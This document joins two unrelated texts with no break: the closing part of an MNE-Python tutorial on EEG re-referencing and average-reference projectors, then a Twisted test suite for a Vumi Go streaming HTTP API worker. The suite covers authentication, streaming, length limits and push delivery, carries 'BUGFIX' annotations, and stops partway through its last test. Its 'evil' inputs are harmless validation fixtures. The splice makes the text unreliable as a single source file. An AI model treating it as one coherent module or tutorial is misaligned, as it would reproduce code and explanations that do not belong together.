# ``copy=False``.

# add new reference channel (all zero)
# add_reference_channels returns a modified copy by default, leaving `raw`
# untouched so we can return to it later.
raw_new_ref = mne.add_reference_channels(raw, ref_channels=['EEG 999'])
raw_new_ref.plot()

###############################################################################
# .. KEEP THESE BLOCKS SEPARATE SO FIGURES ARE BIG ENOUGH TO READ

# set reference to `EEG 050`
# (operates on raw_new_ref in place; the new reference channel becomes flat)
raw_new_ref.set_eeg_reference(ref_channels=['EEG 050'])
raw_new_ref.plot()

###############################################################################
# Notice that the new reference (``EEG 050``) is now flat, while the original
# reference channel that we added back to the data (``EEG 999``) has a non-zero
# signal. Notice also that ``EEG 053`` (which is marked as "bad" in
# ``raw.info['bads']``) is not affected by the re-referencing.
#
#
# Setting average reference
# ^^^^^^^^^^^^^^^^^^^^^^^^^
#
# To set a "virtual reference" that is the average of all channels, you can use
# :meth:`~mne.io.Raw.set_eeg_reference` with ``ref_channels='average'``. Just
# as above, this will not affect any channels marked as "bad", nor will it
# include bad channels when computing the average. However, it does modify the
# :class:`~mne.io.Raw` object in-place, so we'll make a copy first so we can
# still go back to the unmodified :class:`~mne.io.Raw` object later:

# sphinx_gallery_thumbnail_number = 4
# use the average of all channels as reference
# NOTE: ref_channels='average' modifies the object in place, hence the
# .copy() so the original `raw` is preserved for the sections below.
raw_avg_ref = raw.copy().set_eeg_reference(ref_channels='average')
raw_avg_ref.plot()

###############################################################################
# Creating the average reference as a projector
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# If using an average reference, it is possible to create the reference as a
# :term:`projector` rather than subtracting the reference from the data
# immediately by specifying ``projection=True``:

# With projection=True the average reference is added as an (unapplied)
# projector instead of being subtracted from the data immediately.
raw.set_eeg_reference('average', projection=True)
print(raw.info['projs'])  # the new reference projector shows up here

###############################################################################
# Creating the average reference as a projector has a few advantages:
#
# 1. It is possible to turn projectors on or off when plotting, so it is easy
#    to visualize the effect that the average reference has on the data.
#
# 2. If additional channels are marked as "bad" or if a subset of channels are
#    later selected, the projector will be re-computed to take these changes
#    into account (thus guaranteeing that the signal is zero-mean).
#
# 3. If there are other unapplied projectors affecting the EEG channels (such
#    as SSP projectors for removing heartbeat or blink artifacts), EEG
#    re-referencing cannot be performed until those projectors are either
#    applied or removed; adding the EEG reference as a projector is not subject
#    to that constraint. (The reason this wasn't a problem when we applied the
#    non-projector average reference to ``raw_avg_ref`` above is that the
#    empty-room projectors included in the sample data :file:`.fif` file were
#    only computed for the magnetometers.)

# Plot twice: once with the average-reference projector inactive ('Original')
# and once with it active ('Average') to visualize its effect.
for title, proj in zip(['Original', 'Average'], [False, True]):
    fig = raw.plot(proj=proj, n_channels=len(raw))
    # make room for title
    fig.subplots_adjust(top=0.9)
    fig.suptitle('{} reference'.format(title), size='xx-large', weight='bold')

###############################################################################
# EEG reference and source modeling
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# If you plan to perform source modeling (either with EEG or combined EEG/MEG
# data), it is **strongly recommended** to use the
# average-reference-as-projection approach. It is important to use an average
# reference because using a specific
# reference sensor (or even an average of a few sensors) spreads the forward
# model error from the reference sensor(s) into all sensors, effectively
# amplifying the importance of the reference sensor(s) when computing source
# estimates. In contrast, using the average of all EEG channels as reference
# spreads the forward modeling error evenly across channels, so no one channel
# is weighted more strongly during source estimation. See also this `FieldTrip
# FAQ on average referencing`_ for more information.
#
# The main reason for specifying the average reference as a projector was
# mentioned in the previous section: an average reference projector adapts if
# channels are dropped, ensuring that the signal will always be zero-mean when
# the source modeling is performed. In contrast, applying an average reference
# by the traditional subtraction method offers no such guarantee.
#
# For these reasons, when performing inverse imaging, *MNE-Python will
# automatically average-reference the EEG channels if they are present and no
# reference strategy has been specified*. If you want to perform inverse
# imaging and do not want to use an average reference (and hence you accept the
# risks presented in the previous paragraphs), you can force MNE-Python to
# relax its average reference requirement by passing an empty list to
# :meth:`~mne.io.Raw.set_eeg_reference` (i.e., by calling
# ``raw.set_eeg_reference(ref_channels=[])``) prior to performing inverse
# imaging.
#
#
# .. LINKS
#
# .. _`FieldTrip FAQ on average referencing`:
#    http://www.fieldtriptoolbox.org/faq/why_should_i_use_an_average_reference_for_eeg_source_reconstruction/
# .. _`10-20 electrode naming system`:
#    https://en.wikipedia.org/wiki/10%E2%80%9320_system_(EEG)

import base64
import json

from twisted.internet.defer import inlineCallbacks, DeferredQueue, returnValue
from twisted.web.http_headers import Headers
from twisted.web import http
from twisted.web.server import NOT_DONE_YET

from vumi.config import ConfigContext
from vumi.message import TransportUserMessage, TransportEvent
from vumi.tests.helpers import VumiTestCase
from vumi.tests.utils import MockHttpServer, LogCatcher
from vumi.transports.vumi_bridge.client import StreamingClient
from vumi.utils import http_request_full

from go.apps.http_api.resource import (
    StreamResourceMixin, StreamingConversationResource)
from go.apps.tests.helpers import AppWorkerHelper
from go.apps.http_api.vumi_app import StreamingHTTPWorker


class TestStreamingHTTPWorker(VumiTestCase):

    @inlineCallbacks
    def setUp(self):
        """Start a StreamingHTTPWorker, a conversation, and a mock push server."""
        self.app_helper = self.add_helper(AppWorkerHelper(StreamingHTTPWorker))

        # Worker config; web_port 0 lets the server pick a free port.
        self.config = {
            'health_path': '/health/',
            'web_path': '/foo',
            'web_port': 0,
            'metrics_prefix': 'metrics_prefix.',
            'conversation_cache_ttl': 0,
        }
        self.app = yield self.app_helper.get_app_worker(self.config)
        self.addr = self.app.webserver.getHost()
        self.url = 'http://%s:%s%s' % (
            self.addr.host, self.addr.port, self.config['web_path'])

        # Conversation configured with several API tokens; the tests below
        # authenticate with 'token-1'.
        conv_config = {
            'http_api': {
                'api_tokens': [
                    'token-1',
                    'token-2',
                    'token-3',
                ],
                'metric_store': 'metric_store',
            }
        }
        conversation = yield self.app_helper.create_conversation(
            config=conv_config)
        yield self.app_helper.start_conversation(conversation)
        self.conversation = yield self.app_helper.get_conversation(
            conversation.key)

        # HTTP basic auth: account key as username, API token as password.
        self.auth_headers = {
            'Authorization': ['Basic ' + base64.b64encode('%s:%s' % (
                conversation.user_account.key, 'token-1'))],
        }

        self.client = StreamingClient()

        # Mock server to test HTTP posting of inbound messages & events
        self.mock_push_server = MockHttpServer(self.handle_request)
        yield self.mock_push_server.start()
        self.add_cleanup(self.mock_push_server.stop)
        self.push_calls = DeferredQueue()
        self._setup_wait_for_request()
        self.add_cleanup(self._wait_for_requests)

    def _setup_wait_for_request(self):
        """Patch request tracking so teardown can wait for in-flight requests."""
        self._req_state = {
            'queue': DeferredQueue(),
            'expected': 0,
        }
        real_track = StreamingConversationResource.track_request
        real_release = StreamingConversationResource.release_request

        def counting_track(*args, **kw):
            # Every tracked request bumps the number we must wait for.
            self._req_state['expected'] += 1
            return real_track(*args, **kw)

        def notifying_release(*args, **kw):
            # Push the release result onto the queue so waiters wake up.
            d = real_release(*args, **kw)
            return d.addCallback(self._req_state['queue'].put)

        self.patch(
            StreamingConversationResource, 'track_request', counting_track)
        self.patch(
            StreamingConversationResource, 'release_request',
            notifying_release)

    @inlineCallbacks
    def _wait_for_requests(self):
        """Block until every tracked request has been released."""
        state = self._req_state
        while state['expected'] > 0:
            yield state['queue'].get()
            state['expected'] -= 1

    def handle_request(self, request):
        """Queue a pushed request for inspection; leave the response open."""
        pending = self.push_calls
        pending.put(request)
        return NOT_DONE_YET

    @inlineCallbacks
    def pull_message(self, count=1):
        """Dispatch `count` inbound messages and stream them back.

        Returns (receiver, list_of_received_messages).
        """
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        messages = DeferredQueue()
        errors = DeferredQueue()
        receiver = self.client.stream(
            TransportUserMessage, messages.put, errors.put, url,
            Headers(self.auth_headers))

        collected = []
        for idx in range(count):
            yield self.app_helper.make_dispatch_inbound(
                'in %s' % (idx,), message_id=str(idx),
                conv=self.conversation)
            collected.append((yield messages.get()))

        receiver.disconnect()
        returnValue((receiver, collected))

    def assert_bad_request(self, response, reason):
        """Assert a 400 JSON response carrying the given failure reason."""
        self.assertEqual(response.code, http.BAD_REQUEST)
        content_type = response.headers.getRawHeaders('content-type')
        self.assertEqual(content_type, ['application/json; charset=utf-8'])
        body = json.loads(response.delivered_body)
        expected = {
            "success": False,
            "reason": reason,
        }
        self.assertEqual(body, expected)

    @inlineCallbacks
    def test_proxy_buffering_headers_off(self):
        """With proxy buffering disabled, x-accel-buffering should be 'no'."""
        # This is the default, but we patch it anyway to make sure we're
        # testing the right thing should the default change.
        self.patch(StreamResourceMixin, 'proxy_buffering', False)
        receiver, _ = yield self.pull_message()
        buffering = receiver._response.headers.getRawHeaders(
            'x-accel-buffering')
        self.assertEqual(buffering, ['no'])

    @inlineCallbacks
    def test_proxy_buffering_headers_on(self):
        """With proxy buffering enabled, x-accel-buffering should be 'yes'."""
        self.patch(StreamResourceMixin, 'proxy_buffering', True)
        receiver, _ = yield self.pull_message()
        buffering = receiver._response.headers.getRawHeaders(
            'x-accel-buffering')
        self.assertEqual(buffering, ['yes'])

    @inlineCallbacks
    def test_content_type(self):
        """The stream response should be served as UTF-8 JSON."""
        receiver, _ = yield self.pull_message()
        content_type = receiver._response.headers.getRawHeaders(
            'content-type')
        self.assertEqual(content_type, ['application/json; charset=utf-8'])

    @inlineCallbacks
    def test_messages_stream(self):
        """Inbound messages should be delivered over the streaming API."""
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        messages = DeferredQueue()
        errors = DeferredQueue()
        receiver = self.client.stream(
            TransportUserMessage, messages.put, errors.put, url,
            Headers(self.auth_headers))

        msg1 = yield self.app_helper.make_dispatch_inbound(
            'in 1', message_id='1', conv=self.conversation)

        msg2 = yield self.app_helper.make_dispatch_inbound(
            'in 2', message_id='2', conv=self.conversation)

        rm1 = yield messages.get()
        rm2 = yield messages.get()

        receiver.disconnect()

        # Sometimes messages arrive out of order if we're hitting real redis.
        rm1, rm2 = sorted([rm1, rm2], key=lambda m: m['message_id'])

        self.assertEqual(msg1['message_id'], rm1['message_id'])
        self.assertEqual(msg2['message_id'], rm2['message_id'])
        # BUGFIX: DeferredQueue.size is the queue's max-size setting (None
        # here by construction), so `errors.size == None` was always true.
        # Assert that no errors were actually queued instead.
        self.assertEqual(errors.pending, [])

    @inlineCallbacks
    def test_events_stream(self):
        """Acks for outbound messages should arrive on the events stream."""
        url = '%s/%s/events.json' % (self.url, self.conversation.key)

        events = DeferredQueue()
        errors = DeferredQueue()
        # BUGFIX: the error callback was `events.put` (copy-paste), which
        # left the `errors` queue unused and would have mixed errors into
        # the event queue; route errors to their own queue.
        receiver = yield self.client.stream(TransportEvent, events.put,
                                            errors.put, url,
                                            Headers(self.auth_headers))

        msg1 = yield self.app_helper.make_stored_outbound(
            self.conversation, 'out 1', message_id='1')
        ack1 = yield self.app_helper.make_dispatch_ack(
            msg1, conv=self.conversation)

        msg2 = yield self.app_helper.make_stored_outbound(
            self.conversation, 'out 2', message_id='2')
        ack2 = yield self.app_helper.make_dispatch_ack(
            msg2, conv=self.conversation)

        ra1 = yield events.get()
        ra2 = yield events.get()

        receiver.disconnect()

        # Sometimes messages arrive out of order if we're hitting real redis.
        if ra1['event_id'] != ack1['event_id']:
            ra1, ra2 = ra2, ra1

        self.assertEqual(ack1['event_id'], ra1['event_id'])
        self.assertEqual(ack2['event_id'], ra2['event_id'])
        # BUGFIX: `errors.size` is the max-size setting (always None here);
        # check that the error queue is actually empty.
        self.assertEqual(errors.pending, [])

    @inlineCallbacks
    def test_missing_auth(self):
        """Requests without credentials should get a 401 challenge."""
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        queue = DeferredQueue()
        receiver = self.client.stream(
            TransportUserMessage, queue.put, queue.put, url)
        response = yield receiver.get_response()
        self.assertEqual(response.code, http.UNAUTHORIZED)
        challenge = response.headers.getRawHeaders('www-authenticate')
        self.assertEqual(challenge, ['basic realm="Conversation Realm"'])

    @inlineCallbacks
    def test_invalid_auth(self):
        """Requests with bad credentials should get a 401 challenge."""
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        queue = DeferredQueue()

        bad_credentials = base64.b64encode('foo:bar')
        headers = Headers({
            'Authorization': ['Basic %s' % (bad_credentials,)],
        })

        receiver = self.client.stream(
            TransportUserMessage, queue.put, queue.put, url, headers)
        response = yield receiver.get_response()
        self.assertEqual(response.code, http.UNAUTHORIZED)
        challenge = response.headers.getRawHeaders('www-authenticate')
        self.assertEqual(challenge, ['basic realm="Conversation Realm"'])

    @inlineCallbacks
    def test_send_to(self):
        """PUT to messages.json should dispatch an outbound message."""
        msg = {
            'to_addr': '+2345',
            'content': 'foo',
            'message_id': 'evil_id',
        }

        # TaggingMiddleware.add_tag_to_msg(msg, self.tag)

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')

        self.assertEqual(
            response.headers.getRawHeaders('content-type'),
            ['application/json; charset=utf-8'])
        self.assertEqual(response.code, http.OK)
        put_msg = json.loads(response.delivered_body)

        [sent_msg] = self.app_helper.get_dispatched_outbound()
        # BUGFIX: this previously compared sent_msg['to_addr'] with itself
        # (always true); compare against the echoed message as the sibling
        # tests do.
        self.assertEqual(sent_msg['to_addr'], put_msg['to_addr'])
        self.assertEqual(sent_msg['helper_metadata'], {
            'go': {
                'conversation_key': self.conversation.key,
                'conversation_type': 'http_api',
                'user_account': self.conversation.user_account.key,
            },
        })
        # We do not respect the message_id that's been given.
        self.assertNotEqual(sent_msg['message_id'], msg['message_id'])
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['to_addr'], msg['to_addr'])
        self.assertEqual(sent_msg['from_addr'], None)

    @inlineCallbacks
    def test_send_to_within_content_length_limit(self):
        """Messages within the configured length limit should be sent."""
        self.conversation.config['http_api'].update({
            'content_length_limit': 182,
        })
        yield self.conversation.save()

        payload = json.dumps({
            'content': 'foo',
            'to_addr': '+1234',
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')
        content_type = response.headers.getRawHeaders('content-type')
        self.assertEqual(content_type, ['application/json; charset=utf-8'])
        put_msg = json.loads(response.delivered_body)
        self.assertEqual(response.code, http.OK)

        [sent_msg] = self.app_helper.get_dispatched_outbound()
        expected_metadata = {
            'go': {
                'conversation_key': self.conversation.key,
                'conversation_type': 'http_api',
                'user_account': self.conversation.user_account.key,
            },
        }
        self.assertEqual(sent_msg['to_addr'], put_msg['to_addr'])
        self.assertEqual(sent_msg['helper_metadata'], expected_metadata)
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['session_event'], None)
        self.assertEqual(sent_msg['to_addr'], '+1234')
        self.assertEqual(sent_msg['from_addr'], None)

    @inlineCallbacks
    def test_send_to_content_too_long(self):
        """Messages over the configured length limit should be rejected."""
        self.conversation.config['http_api'].update({
            'content_length_limit': 10,
        })
        yield self.conversation.save()

        payload = json.dumps({
            'content': "This message is longer than 10 characters.",
            'to_addr': '+1234',
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Payload content too long: 42 > 10")

    @inlineCallbacks
    def test_send_to_with_evil_content(self):
        """A non-string content value should be rejected."""
        payload = json.dumps({
            'content': 0xBAD,
            'to_addr': '+1234',
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Invalid or missing value for payload key 'content'")

    @inlineCallbacks
    def test_send_to_with_evil_to_addr(self):
        """A non-string to_addr value should be rejected."""
        payload = json.dumps({
            'content': 'good',
            'to_addr': 1234,
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Invalid or missing value for payload key 'to_addr'")

    @inlineCallbacks
    def test_in_reply_to(self):
        """Replies to an inbound message should be routed to its sender."""
        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        payload = json.dumps({
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')

        content_type = response.headers.getRawHeaders('content-type')
        self.assertEqual(content_type, ['application/json; charset=utf-8'])
        put_msg = json.loads(response.delivered_body)
        self.assertEqual(response.code, http.OK)

        [sent_msg] = self.app_helper.get_dispatched_outbound()
        expected_metadata = {
            'go': {
                'conversation_key': self.conversation.key,
                'conversation_type': 'http_api',
                'user_account': self.conversation.user_account.key,
            },
        }
        self.assertEqual(sent_msg['to_addr'], put_msg['to_addr'])
        self.assertEqual(sent_msg['helper_metadata'], expected_metadata)
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['session_event'], None)
        self.assertEqual(sent_msg['to_addr'], inbound_msg['from_addr'])
        self.assertEqual(sent_msg['from_addr'], '9292')

    @inlineCallbacks
    def test_in_reply_to_within_content_length_limit(self):
        """Replies within the configured length limit should be sent."""
        self.conversation.config['http_api'].update({
            'content_length_limit': 182,
        })
        yield self.conversation.save()

        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        payload = json.dumps({
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')
        content_type = response.headers.getRawHeaders('content-type')
        self.assertEqual(content_type, ['application/json; charset=utf-8'])
        put_msg = json.loads(response.delivered_body)
        self.assertEqual(response.code, http.OK)

        [sent_msg] = self.app_helper.get_dispatched_outbound()
        expected_metadata = {
            'go': {
                'conversation_key': self.conversation.key,
                'conversation_type': 'http_api',
                'user_account': self.conversation.user_account.key,
            },
        }
        self.assertEqual(sent_msg['to_addr'], put_msg['to_addr'])
        self.assertEqual(sent_msg['helper_metadata'], expected_metadata)
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['session_event'], None)
        self.assertEqual(sent_msg['to_addr'], inbound_msg['from_addr'])
        self.assertEqual(sent_msg['from_addr'], '9292')

    @inlineCallbacks
    def test_in_reply_to_content_too_long(self):
        """Replies over the configured length limit should be rejected."""
        self.conversation.config['http_api'].update({
            'content_length_limit': 10,
        })
        yield self.conversation.save()

        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        payload = json.dumps({
            'content': "This message is longer than 10 characters.",
            'in_reply_to': inbound_msg['message_id'],
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Payload content too long: 42 > 10")

    @inlineCallbacks
    def test_in_reply_to_with_evil_content(self):
        """A non-string content value in a reply should be rejected."""
        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        payload = json.dumps({
            'content': 0xBAD,
            'in_reply_to': inbound_msg['message_id'],
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')
        self.assert_bad_request(
            response, "Invalid or missing value for payload key 'content'")

    @inlineCallbacks
    def test_invalid_in_reply_to(self):
        """Replying to an unknown message id should be a bad request."""
        payload = json.dumps({
            'content': 'foo',
            'in_reply_to': '1',  # this doesn't exist
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')
        self.assert_bad_request(response, 'Invalid in_reply_to value')

    @inlineCallbacks
    def test_invalid_in_reply_to_with_missing_conversation_key(self):
        """Replying to a message with no conversation key should fail."""
        # create a message with no conversation
        inbound_msg = self.app_helper.make_inbound('in 1', message_id='msg-1')
        vumi_api = self.app_helper.vumi_helper.get_vumi_api()
        yield vumi_api.mdb.add_inbound_message(inbound_msg)

        payload = json.dumps({
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        with LogCatcher(message='Invalid reply to message <Message .*>'
                        ' which has no conversation key') as lc:
            response = yield http_request_full(
                url, payload, self.auth_headers, method='PUT')
            [error_log] = lc.messages()

        self.assert_bad_request(response, "Invalid in_reply_to value")
        self.assertTrue(inbound_msg['message_id'] in error_log)

    @inlineCallbacks
    def test_in_reply_to_with_evil_session_event(self):
        """An invalid session_event should be rejected before dispatch."""
        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        payload = json.dumps({
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
            'session_event': 0xBAD5E55104,
        })

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, payload, self.auth_headers, method='PUT')

        self.assert_bad_request(
            response,
            "Invalid or missing value for payload key 'session_event'")
        # Nothing may have been dispatched for the rejected message.
        self.assertEqual(self.app_helper.get_dispatched_outbound(), [])

    @inlineCallbacks
    def test_in_reply_to_with_evil_message_id(self):
        """A caller-supplied message_id on a reply should be ignored."""
        inbound_msg = yield self.app_helper.make_stored_inbound(
            self.conversation, 'in 1', message_id='1')

        msg = {
            'content': 'foo',
            'in_reply_to': inbound_msg['message_id'],
            'message_id': 'evil_id'
        }

        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        response = yield http_request_full(url, json.dumps(msg),
                                           self.auth_headers, method='PUT')

        self.assertEqual(response.code, http.OK)
        content_type = response.headers.getRawHeaders('content-type')
        self.assertEqual(content_type, ['application/json; charset=utf-8'])
        put_msg = json.loads(response.delivered_body)
        [sent_msg] = self.app_helper.get_dispatched_outbound()

        # We do not respect the message_id that's been given.
        self.assertNotEqual(sent_msg['message_id'], msg['message_id'])
        self.assertEqual(sent_msg['message_id'], put_msg['message_id'])
        self.assertEqual(sent_msg['to_addr'], inbound_msg['from_addr'])
        self.assertEqual(sent_msg['from_addr'], '9292')

    @inlineCallbacks
    def test_metric_publishing(self):
        """Metrics PUT to metrics.json should be published with the prefix."""
        metric_data = [
            ("vumi.test.v1", 1234, 'SUM'),
            ("vumi.test.v2", 3456, 'AVG'),
        ]

        url = '%s/%s/metrics.json' % (self.url, self.conversation.key)
        response = yield http_request_full(
            url, json.dumps(metric_data), self.auth_headers, method='PUT')

        self.assertEqual(response.code, http.OK)
        content_type = response.headers.getRawHeaders('content-type')
        self.assertEqual(content_type, ['application/json; charset=utf-8'])

        prefix = "go.campaigns.test-0-user.stores.metric_store"
        expected = [
            ("%s.vumi.test.v1" % prefix, 1234),
            ("%s.vumi.test.v2" % prefix, 3456),
        ]
        self.assertEqual(
            self.app_helper.get_published_metrics(self.app), expected)

    @inlineCallbacks
    def test_concurrency_limits(self):
        """Connections beyond the concurrency limit should be refused."""
        config = yield self.app.get_config(None)
        concurrency = config.concurrency_limit
        queue = DeferredQueue()
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)

        # Open exactly as many streams as the limit allows.
        receivers = []
        for _ in range(concurrency):
            receivers.append(self.client.stream(
                TransportUserMessage, queue.put, queue.put, url,
                Headers(self.auth_headers)))

        for i in range(concurrency):
            msg = yield self.app_helper.make_dispatch_inbound(
                'in %s' % (i,), message_id=str(i), conv=self.conversation)
            received = yield queue.get()
            self.assertEqual(msg['message_id'], received['message_id'])

        # One more connection should now be rejected.
        maxed_out_resp = yield http_request_full(
            url, method='GET', headers=self.auth_headers)

        self.assertEqual(maxed_out_resp.code, 403)
        self.assertTrue(
            'Too many concurrent connections' in maxed_out_resp.delivered_body)

        for receiver in receivers:
            receiver.disconnect()

    @inlineCallbacks
    def test_disabling_concurrency_limit(self):
        # With the limit disabled, is_allowed() should always pass.
        conv_resource = StreamingConversationResource(
            self.app, self.conversation.key)
        # negative concurrency limit disables it
        ctxt = ConfigContext(user_account=self.conversation.user_account.key,
                             concurrency_limit=-1)
        config = yield self.app.get_config(msg=None, ctxt=ctxt)
        self.assertTrue(
            (yield conv_resource.is_allowed(
                config, self.conversation.user_account.key)))

    @inlineCallbacks
    def test_backlog_on_connect(self):
        # Messages that arrive before any client is connected should be
        # queued, then delivered in arrival order once a stream opens.
        for i in range(10):
            yield self.app_helper.make_dispatch_inbound(
                'in %s' % (i,), message_id=str(i), conv=self.conversation)

        queue = DeferredQueue()
        url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        receiver = self.client.stream(
            TransportUserMessage, queue.put, queue.put, url,
            Headers(self.auth_headers))

        # All backlogged messages are replayed in order.
        for i in range(10):
            received = yield queue.get()
            self.assertEqual(received['message_id'], str(i))

        receiver.disconnect()

    @inlineCallbacks
    def test_health_response(self):
        # The health resource reports the number of connected stream
        # clients: 0 before connecting, 1 while connected, 0 afterwards.
        health_url = 'http://%s:%s%s' % (
            self.addr.host, self.addr.port, self.config['health_path'])

        response = yield http_request_full(health_url, method='GET')
        self.assertEqual(response.delivered_body, '0')

        yield self.app_helper.make_dispatch_inbound(
            'in 1', message_id='1', conv=self.conversation)

        queue = DeferredQueue()
        stream_url = '%s/%s/messages.json' % (self.url, self.conversation.key)
        stream_receiver = self.client.stream(
            TransportUserMessage, queue.put, queue.put, stream_url,
            Headers(self.auth_headers))

        # Wait for the message so we know the stream is established.
        yield queue.get()

        response = yield http_request_full(health_url, method='GET')
        self.assertEqual(response.delivered_body, '1')

        stream_receiver.disconnect()

        response = yield http_request_full(health_url, method='GET')
        self.assertEqual(response.delivered_body, '0')

        # Disconnecting should leave an empty client list behind, not
        # remove the key entirely.
        self.assertEqual(self.app.client_manager.clients, {
            'sphex.stream.message.%s' % (self.conversation.key,): []
        })

    @inlineCallbacks
    def test_post_inbound_message(self):
        # Set the URL so stuff is HTTP Posted instead of streamed.
        self.conversation.config['http_api'].update({
            'push_message_url': self.mock_push_server.url,
        })
        yield self.conversation.save()

        msg_d = self.app_helper.make_dispatch_inbound(
            'in 1', message_id='1', conv=self.conversation)

        # The inbound message should be POSTed to the configured URL.
        req = yield self.push_calls.get()
        posted_json_data = req.content.read()
        req.finish()
        msg = yield msg_d

        # The POSTed body is the full message, JSON-encoded.
        posted_msg = TransportUserMessage.from_json(posted_json_data)
        self.assertEqual(posted_msg['message_id'], msg['message_id'])

    @inlineCallbacks
    def test_post_inbound_message_201_response(self):
        # Set the URL so stuff is HTTP Posted instead of streamed.
        self.conversation.config['http_api'].update({
            'push_message_url': self.mock_push_server.url,
        })
        yield self.conversation.save()

        # A 201 from the remote end is a success and must not be logged
        # as an unexpected response code.
        with LogCatcher(message='Got unexpected response code') as lc:
            msg_d = self.app_helper.make_dispatch_inbound(
                'in 1', message_id='1', conv=self.conversation)
            req = yield self.push_calls.get()
            req.setResponseCode(201)
            req.finish()
            yield msg_d
        self.assertEqual(lc.messages(), [])

    @inlineCallbacks
    def test_post_inbound_message_500_response(self):
        # Set the URL so stuff is HTTP Posted instead of streamed.
        self.conversation.config['http_api'].update({
            'push_message_url': self.mock_push_server.url,
        })
        yield self.conversation.save()

        # A 500 from the remote end should produce a single warning log
        # mentioning both the target URL and the response code.
        with LogCatcher(message='Got unexpected response code') as lc:
            msg_d = self.app_helper.make_dispatch_inbound(
                'in 1', message_id='1', conv=self.conversation)
            req = yield self.push_calls.get()
            req.setResponseCode(500)
            req.finish()
            yield msg_d
        [warning_log] = lc.messages()
        self.assertTrue(self.mock_push_server.url in warning_log)
        self.assertTrue('500' in warning_log)

    @inlineCallbacks
    def test_post_inbound_event(self):
        # Set the URL so stuff is HTTP Posted instead of streamed.
        self.conversation.config['http_api'].update({
            'push_event_url': self.mock_push_server.url,
        })
        yield self.conversation.save()

        # An ack event for a stored outbound message should be POSTed,
        # JSON-encoded, to the configured event URL.
        msg = yield self.app_helper.make_stored_outbound(
            self.conversation, 'out 1', message_id='1')
        event_d = self.app_helper.make_dispatch_ack(
            msg, conv=self.conversation)

        req = yield self.push_calls.get()
        posted_json_data = req.content.read()
        req.finish()
        ack = yield event_d

        self.assertEqual(TransportEvent.from_json(posted_json_data), ack)

    @inlineCallbacks
    def test_bad_urls(self):
        # Requests to unknown or malformed API paths must return 404.
        def assert_not_found(url, headers=None):
            # NOTE: the original helper ignored its `url` argument and
            # always requested `self.url`, so most cases below were never
            # really exercised; it also used a mutable default ({}).
            d = http_request_full(url, method='GET', headers=headers or {})
            d.addCallback(lambda r: self.assertEqual(r.code, http.NOT_FOUND))
            return d

        yield assert_not_found(self.url)
        yield assert_not_found(self.url + '/')
        yield assert_not_found('%s/%s' % (self.url, self.conversation.key),
                               headers=self.auth_headers)
        yield assert_not_found('%s/%s/' % (self.url, self.conversation.key),
                               headers=self.auth_headers)
        yield assert_not_found('%s/%s/foo' % (self.url, self.conversation.key),
                               headers=self.auth_headers)

    @inlineCallbacks
    def test_send_message_command(self):
        # A `send_message` API command should dispatch a single outbound
        # user message carrying the supplied content, addresses, tag
        # metadata, and the owning Go user account.
        yield self.app_helper.dispatch_command(
            'send_message',
            user_account_key=self.conversation.user_account.key,
            conversation_key=self.conversation.key,
            command_data={
                u'batch_id': u'batch-id',
                u'content': u'foo',
                u'to_addr': u'to_addr',
                u'msg_options': {
                    u'helper_metadata': {
                        u'tag': {
                            u'tag': [u'longcode', u'default10080']
                        }
                    },
                    u'from_addr': u'default10080',
                }
            })

        [msg] = self.app_helper.get_dispatched_outbound()
        self.assertEqual(msg.payload['to_addr'], "to_addr")
        self.assertEqual(msg.payload['from_addr'], "default10080")
        self.assertEqual(msg.payload['content'], "foo")
        self.assertEqual(msg.payload['message_type'], "user_message")
        # The application adds its own `go` metadata alongside the tag.
